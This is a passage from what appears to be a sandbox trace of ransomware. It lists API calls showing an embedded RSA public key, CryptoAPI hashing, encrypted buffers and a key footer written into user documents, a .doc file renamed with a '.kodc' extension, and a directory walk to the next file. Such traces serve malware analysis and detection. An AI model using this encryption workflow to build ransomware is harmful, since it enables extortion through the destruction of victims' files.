KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.519] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.520] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.520] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.520] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.520] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.520] GetLastError () returned 0x0 [0098.520] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.520] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.520] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.520] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.520] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xfe20) returned 0x9ba4d90 [0098.521] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d258 [0098.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa30 [0098.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d2a0 [0098.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa48 [0098.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa78 [0098.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa90 [0098.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.521] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa78 | out: hHeap=0x630000) returned 1 [0098.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa90 | out: hHeap=0x630000) returned 1 [0098.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0098.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aa90 [0098.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331aa78 [0098.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0098.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0098.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0098.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa90 | out: hHeap=0x630000) returned 1 [0098.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa78 | out: hHeap=0x630000) returned 1 [0098.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.522] GetCurrentThreadId () returned 0x42c [0098.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8eff8 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.523] GetCurrentThreadId () returned 0x42c [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa78 [0098.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa90 [0098.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa60 [0098.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aaa8 [0098.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0098.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa78 | out: hHeap=0x630000) returned 1 [0098.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa78 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa78 | out: hHeap=0x630000) returned 1 [0098.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aaa8 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa90 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa60 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa48 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d2a0 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.526] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0xfe1b, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xfe1b, lpOverlapped=0x0) returned 1 [0098.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.526] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xfe20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.527] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0098.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0098.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.527] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.527] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.527] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.527] CloseHandle (hObject=0x5cc) returned 1 [0098.531] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.531] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.531] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.531] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\o1A33chNmPJo_UuE.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\o1a33chnmpjo_uue.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\o1A33chNmPJo_UuE.doc.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\o1a33chnmpjo_uue.doc.kodc")) returned 1 [0098.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.532] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.534] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0098.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0098.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2d28 [0098.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dab0 [0098.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2d28 | out: hHeap=0x630000) returned 1 [0098.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0098.534] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec78b280, ftCreationTime.dwHighDateTime=0x1d5bec7, ftLastAccessTime.dwLowDateTime=0xd26a4210, ftLastAccessTime.dwHighDateTime=0x1d5b647, ftLastWriteTime.dwLowDateTime=0xd26a4210, ftLastWriteTime.dwHighDateTime=0x1d5b647, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P3UG-u5cYJO8Spn.rtf", cAlternateFileName="P3UG-U~1.RTF")) returned 1 [0098.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.534] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\P3UG-u5cYJO8Spn.rtf") returned=".rtf" [0098.534] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\P3UG-u5cYJO8Spn.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p3ug-u5cyjo8spn.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.534] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=3788) returned 1 [0098.534] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.538] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xea6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.538] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.539] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 